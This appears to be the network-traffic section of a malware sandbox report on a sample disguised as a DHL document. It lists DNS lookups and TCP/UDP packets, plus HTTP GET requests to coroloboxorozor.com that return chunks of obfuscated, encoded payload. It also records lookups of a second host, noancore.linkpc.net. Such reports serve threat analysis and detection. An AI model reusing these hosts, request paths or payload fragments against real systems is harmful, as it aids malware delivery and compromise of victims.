                                                                                                                                        Feb 25, 2021 11:04:07.174915075 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.175362110 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.176398039 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.176429987 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.176500082 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.177921057 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.177953959 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.178299904 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.224905014 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.224950075 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.225081921 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.225579977 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.225608110 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.225701094 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.227134943 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.227166891 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.227252960 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.228637934 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.228672028 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.228755951 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.232090950 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.232127905 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.232152939 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.232273102 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.232434988 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.232460022 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.232511044 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.234016895 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.234055042 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.234137058 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.235534906 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.235568047 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.235636950 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.237054110 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.237087011 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.237138033 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.238579988 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.238612890 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.238672018 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.240075111 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.240108967 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.240168095 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.241611958 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.241643906 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.241707087 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.243125916 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.243160009 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.243225098 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.244690895 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.244730949 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.244828939 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.246179104 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.246211052 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.246260881 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.247716904 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.248449087 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.248481989 CET8049716172.67.172.17192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.248640060 CET4971680192.168.2.5172.67.172.17
                                                                                                                                        Feb 25, 2021 11:04:07.248986006 CET4971680192.168.2.5172.67.172.17

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Feb 25, 2021 11:03:57.636429071 CET6206053192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:03:57.686729908 CET53620608.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:03:57.782604933 CET6180553192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:03:57.832546949 CET53618058.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:03:57.841439009 CET5479553192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:03:57.891654015 CET53547958.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:03:58.465707064 CET4955753192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:03:58.514386892 CET53495578.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:03:59.245920897 CET6173353192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:03:59.294641972 CET53617338.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:00.205962896 CET6544753192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:00.254743099 CET53654478.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:00.685094118 CET5244153192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:00.748605967 CET53524418.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:01.144614935 CET6217653192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:01.193430901 CET53621768.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:02.442065954 CET5959653192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:02.490878105 CET53595968.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:03.763638973 CET6529653192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:03.812383890 CET53652968.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:06.193120003 CET6318353192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:06.252135992 CET53631838.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:06.876347065 CET6015153192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:06.933918953 CET53601518.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:07.150935888 CET5696953192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:07.199676991 CET53569698.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:14.779427052 CET5516153192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:14.828146935 CET53551618.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:26.155874014 CET5475753192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:26.216181993 CET53547578.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:29.199273109 CET4999253192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:29.247950077 CET53499928.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:30.199223995 CET6007553192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:30.248034000 CET53600758.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:48.094589949 CET5501653192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:48.143368006 CET53550168.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:04:53.852750063 CET6434553192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:04:53.904506922 CET53643458.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:05:04.625102043 CET5712853192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:05:04.684876919 CET53571288.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:05:10.422106028 CET5479153192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:05:10.483798027 CET53547918.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:05:14.601785898 CET5046353192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:05:14.660923004 CET53504638.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:05:32.043323040 CET5039453192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:05:32.110202074 CET53503948.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:06:11.326905966 CET5853053192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:06:11.375838995 CET53585308.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:06:12.990271091 CET5381353192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:06:13.039043903 CET53538138.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:06:16.882678032 CET6373253192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:06:16.934257984 CET53637328.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:06:17.450437069 CET5734453192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:06:17.499079943 CET53573448.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:06:26.142319918 CET5445053192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:06:26.309751987 CET53544508.8.8.8192.168.2.5
                                                                                                                                        Feb 25, 2021 11:06:43.423315048 CET5926153192.168.2.58.8.8.8
                                                                                                                                        Feb 25, 2021 11:06:43.598798990 CET53592618.8.8.8192.168.2.5

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                        Feb 25, 2021 11:04:06.876347065 CET192.168.2.58.8.8.80xe24aStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:05:04.625102043 CET192.168.2.58.8.8.80xb76cStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:05:14.601785898 CET192.168.2.58.8.8.80xac4dStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:06:26.142319918 CET192.168.2.58.8.8.80x4709Standard query (0)noancore.linkpc.netA (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:06:43.423315048 CET192.168.2.58.8.8.80xbf5cStandard query (0)noancore.linkpc.netA (IP address)IN (0x0001)

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                        Feb 25, 2021 11:04:06.933918953 CET8.8.8.8192.168.2.50xe24aNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:04:06.933918953 CET8.8.8.8192.168.2.50xe24aNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:05:04.684876919 CET8.8.8.8192.168.2.50xb76cNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:05:04.684876919 CET8.8.8.8192.168.2.50xb76cNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:05:14.660923004 CET8.8.8.8192.168.2.50xac4dNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:05:14.660923004 CET8.8.8.8192.168.2.50xac4dNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:06:11.375838995 CET8.8.8.8192.168.2.50xeedfNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:06:26.309751987 CET8.8.8.8192.168.2.50x4709No error (0)noancore.linkpc.net185.157.160.229A (IP address)IN (0x0001)
                                                                                                                                        Feb 25, 2021 11:06:43.598798990 CET8.8.8.8192.168.2.50xbf5cNo error (0)noancore.linkpc.net185.157.160.229A (IP address)IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • coroloboxorozor.com

                                                                                                                                        HTTP Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        0192.168.2.549716172.67.172.1780C:\Users\user\Desktop\DHL_document1102202068090891.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Feb 25, 2021 11:04:07.070266962 CET1369OUTGET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Feb 25, 2021 11:04:07.162595987 CET1371INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:04:07 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=db377c0c2b0e77e2f33c1a9f12e02345a1614247447; expires=Sat, 27-Mar-21 10:04:07 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:27 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3e624400001ede762df000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tDpIlYivUN5We9fT8AnqcwltA0HbqgEBOCnWQ8%2FwKxQFMUaXdjEbcfSCVAONyYGiNMQaXBI862c8SYTV83vzVfjOURgd4jUltfAGhSfsBHN4Dzg%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627099b06e251ede-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 37 63 38 62 0d 0a 3c 70 3e 44 44 65 58 78 65 61 49 49 65 78 65 4d 65 78 65 78 65 78 65 49 65 78 65 78 65 78 65 6b 69 69 65 6b 69 69 65 78 65 78 65 61 53 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 72 49 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 61 6b 53 65 78 65 78 65 78 65 61 49 65 4d 61 65 61 53 72 65 61 49 65 78 65 61 53 78 65 58 65 6b 78 69 65 4d 4d 65 61 53 49 65 61 65 44 72 65 6b 78 69 65 4d 4d 65 53 49 65 61 78 49 65 61 78 69 65 61 61 69 65 4d 6b 65 61 61 6b 65 61 61 49 65 61 61 61 65 61 78 4d 65 61 61 49 65 58 44 65 61 78 58 65 4d 6b 65 58 58 65 58 44 65 61 61 78 65 61 61 78 65 61 61 61 65 61 61 72 65 4d 6b 65 58 53 65 61 78 61 65 4d 6b 65 61 61 49 65 61 61 44 65 61 61 78 65 4d 6b 65 61 78 69 65 61 61 78 65 4d 6b 65 72 53 65 44 58 65 53 4d 65 4d 6b 65 61 78 58 65 61 61 61 65 61 78 78 65 61 78 61 65 49 72 65 61 4d 65 61 4d 65 61 78 65 4d 72 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 53 78 65 72 58 65 78 65 78 65 44 72 65 61 65 4d 65 78 65 44 72 65 61 49 6b 65 49 61 65 61 53 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 78 65 6b 6b 49 65 78 65 4d 49 65 78 65 61 61 65 61 65 53 78 65 78 65 78 65 61 49 49 65 61 78 65 78 65 78 65 72 65 78 65 78 65 78 65 78 65 78 65 78 65 72 6b 65 61
                                                                                                                                        Data Ascii: 7c8b<p>DDeXxeaIIexeMexexexeIexexexekiiekiiexexeaSIexexexexexexexerIexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexexeakSexexexeaIeMaeaSreaIexeaSxeXekxieMMeaSIeaeDrekxieMMeSIeaxIeaxieaaieMkeaakeaaIeaaaeaxMeaaIeXDeaxXeMkeXXeXDeaaxeaaxeaaaeaareMkeXSeaxaeMkeaaIeaaDeaaxeMkeaxieaaxeMkerSeDXeSMeMkeaxXeaaaeaxxeaxaeIreaMeaMeaxeMrexexexexexexexeSxerXexexeDreaeMexeDreaIkeIaeaSxexexexexexexexexekkIexeMIexeaaeaeSxexexeaIIeaxexexerexexexexexexerkea
                                                                                                                                        Feb 25, 2021 11:04:07.669373035 CET2436OUTGET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 11:04:07.749636889 CET2437INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:04:07 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=db377c0c2b0e77e2f33c1a9f12e02345a1614247447; expires=Sat, 27-Mar-21 10:04:07 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:30 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3e649c00001ede528e0000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=f1rsb9nipD282Yt%2F9MuV1ey6zJKRR3CNmdtKA4%2FyKqe5hvjE%2BxFGMhboc37oKt9cK%2BgCzc1SsV%2BDfHjRwpXoiBKczkoHvcM%2BUEa5RDdxDzkqgkvI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627099b42c281ede-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 39 31 33 0d 0a 3c 70 3e 6b 44 65 4d 4d 65 61 6b 78 65 61 61 72 65 61 78 72 65 69 53 65 61 49 72 65 6b 61 61 65 61 53 61 65 58 53 65 61 6b 53 65 6b 61 78 65 44 44 65 61 6b 78 65 61 78 61 65 61 69 58 65 6b 49 4d 65 72 58 65 53 53 65 61 44 4d 65 6b 6b 58 65 61 61 4d 65 61 6b 58 65 61 44 65 6b 49 53 65 61 72 72 65 61 6b 61 65 49 69 65 6b 6b 4d 65 49 44 65 6b 65 4d 49 65 6b 61 72 65 6b 6b 53 65 44 72 65 6b 61 4d 65 61 53 65 6b 69 65 61 72 72 65 78 65 61 6b 49 65 61 61 49 65 6b 69 6b 65 61 78 65 61 49 72 65 53 49 65 61 53 72 65 49 65 61 53 61 65 49 58 65 61 58 44 65 61 69 53 65 61 4d 58 65 4d 44 65 61 6b 61 65 4d 53 65 4d 6b 65 6b 6b 53 65 61 6b 4d 65 6b 78 6b 65 4d 44 65 61 49 65 61 58 61 65 6b 4d 58 65 69 6b 65 6b 4d 49 65 49 65 58 53 65 44 6b 65 72 6b 65 61 53 69 65 61 61 72 65 6b 69 61 65 72 53 65 69 78 65 6b 4d 53 65 61 6b 72 65 4d 78 65 49 53 65 6b 49 72 65 61 72 6b 65 61 69 65 61 58 53 65 61 72 78 65 61 6b 6b 65 61 44 44 65 61 6b 78 65 58 44 65 6b 61 53 65 53 69 65 72 49 65 61 69 69 65 4d 58 65 61 78 65 61 53 49 65 78 65 61 4d 58 65 69 78 65 53 6b 65 61 78 61 65 61 53 4d 65 6b 49 58 65 61 61 72 65 61 69 6b 65 6b 6b 58 65 6b 58 65 61 69 4d 65 6b 49 65 61 72 49 65 61 58 65 61 4d 4d 65 72 53 65 61 49 49 65 6b 53 65 6b 4d 53 65 6b 49 49 65 6b 49 58 65 61 44 6b 65 4d 72 65 61 4d 53 65 61 6b 53 65 6b 49 61 65 61 44 49 65 61 72 44 65 4d 49 65
                                                                                                                                        Data Ascii: 913<p>kDeMMeakxeaareaxreiSeaIrekaaeaSaeXSeakSekaxeDDeakxeaxaeaiXekIMerXeSSeaDMekkXeaaMeakXeaDekISearreakaeIiekkMeIDekeMIekarekkSeDrekaMeaSekiearrexeakIeaaIekikeaxeaIreSIeaSreIeaSaeIXeaXDeaiSeaMXeMDeakaeMSeMkekkSeakMekxkeMDeaIeaXaekMXeikekMIeIeXSeDkerkeaSieaarekiaerSeixekMSeakreMxeISekIrearkeaieaXSearxeakkeaDDeakxeXDekaSeSierIeaiieMXeaxeaSIexeaMXeixeSkeaxaeaSMekIXeaareaikekkXekXeaiMekIearIeaXeaMMerSeaIIekSekMSekIIekIXeaDkeMreaMSeakSekIaeaDIearDeMIe
                                                                                                                                        Feb 25, 2021 11:04:09.336656094 CET3504OUTGET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Feb 25, 2021 11:04:09.409914970 CET3506INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:04:09 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d94999d64ea9e0d16b96ff0b4933602ef1614247449; expires=Sat, 27-Mar-21 10:04:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:31 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3e6b1d00001ede6dbbb000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZX0z3WOLs3Witgs56TqDX%2BQJPUR%2B6xOlviXjFlakInx2%2FWw1qzMo123MKshw4vxc86UYC6OHvWuq0FX0459sNKubCoVqJqod5RseU5IL%2FDf7t5Xp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627099be9ed31ede-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 37 63 37 66 0d 0a 3c 70 3e 4d 58 65 61 72 78 65 4d 58 65 61 69 58 65 4d 58 65 61 72 69 65 4d 58 65 61 69 78 65 4d 58 65 61 72 58 65 4d 58 65 61 72 69 65 4d 58 65 61 65 61 61 65 49 58 65 78 65 49 53 65 78 65 49 53 65 78 65 69 61 65 78 65 69 61 65 78 65 78 65 49 4d 65 6b 49 53 65 61 58 53 65 61 72 65 61 58 58 65 6b 49 65 61 58 58 65 6b 61 69 65 61 58 53 65 6b 61 4d 65 61 58 53 65 6b 4d 6b 65 61 58 53 65 72 65 61 58 58 65 6b 61 65 61 58 58 65 6b 49 69 65 61 58 53 65 58 65 61 58 58 65 61 58 65 61 58 58 65 72 65 61 58 58 65 6b 65 61 58 58 65 69 65 61 58 58 65 6b 6b 53 65 61 58 53 65 61 72 65 61 58 58 65 61 69 65 61 58 58 65 6b 61 65 61 58 58 65 72 65 61 58 58 65 6b 69 65 61 58 58 65 6b 61 65 61 58 58 65 61 65 61 61 65 69 4d 65 78 65 49 53 65 78 65 69 72 65 78 65 69 6b 65 78 65 69 44 65 78 65 78 65 4d 69 65 61 61 6b 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 6b 44 65 6b 61 61 65 61 4d 78 65 6b 61 61 65 61 61 78 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 6b 58 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 49 69 65 6b 61 61 65 61 78 44 65 6b 61 61 65 61 4d 61 65 6b 61 61 65 61 4d 58 65 6b 61 61 65 61 49 61 65 6b 61 61 65 61 49 49 65 6b 61 61 65 61 69 61 65 6b 61 61 65 61 65 61 61 65 69 4d 65 78 65 69 6b 65 78 65 49 53 65 78 65 69 6b 65 78 65 69 49 65 78 65 78 65 49 61 65 61 44 58 65 4d 44 65 6b 78 53 65 4d 44 65 61
                                                                                                                                        Data Ascii: 7c7f<p>MXearxeMXeaiXeMXearieMXeaixeMXearXeMXearieMXeaeaaeIXexeISexeISexeiaexeiaexexeIMekISeaXSeareaXXekIeaXXekaieaXSekaMeaXSekMkeaXSereaXXekaeaXXekIieaXSeXeaXXeaXeaXXereaXXekeaXXeieaXXekkSeaXSeareaXXeaieaXXekaeaXXereaXXekieaXXekaeaXXeaeaaeiMexeISexeirexeikexeiDexexeMieaakekaaeaMaekaaeakDekaaeaMxekaaeaaxekaaeaIIekaaeaIaekaaeakXekaaeaMaekaaeaIiekaaeaIiekaaeaxDekaaeaMaekaaeaMXekaaeaIaekaaeaIIekaaeaiaekaaeaeaaeiMexeikexeISexeikexeiIexexeIaeaDXeMDekxSeMDea


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        1192.168.2.549727172.67.172.1780C:\Users\user\Desktop\DHL_document1102202068090891.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Feb 25, 2021 11:05:04.825196981 CET3702OUTGET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Feb 25, 2021 11:05:04.940366030 CET3704INHTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 10:05:04 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d896417aad4a9eeab7046399ba35b207c1614247504; expires=Sat, 27-Mar-21 10:05:04 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 01:01:27 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087a3f43de0000c781bbbc6000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FbJ7VUg2ftnWvx9%2F09XhSlLaFwax9JYF0kKx9Qz5ofbGqwGMZtzccaGmNeMoxhouExru9ZjgVEiJIYVKwFQnppOC3DsEHrADSQavC2upj9bTifPt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62709b19694ec781-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
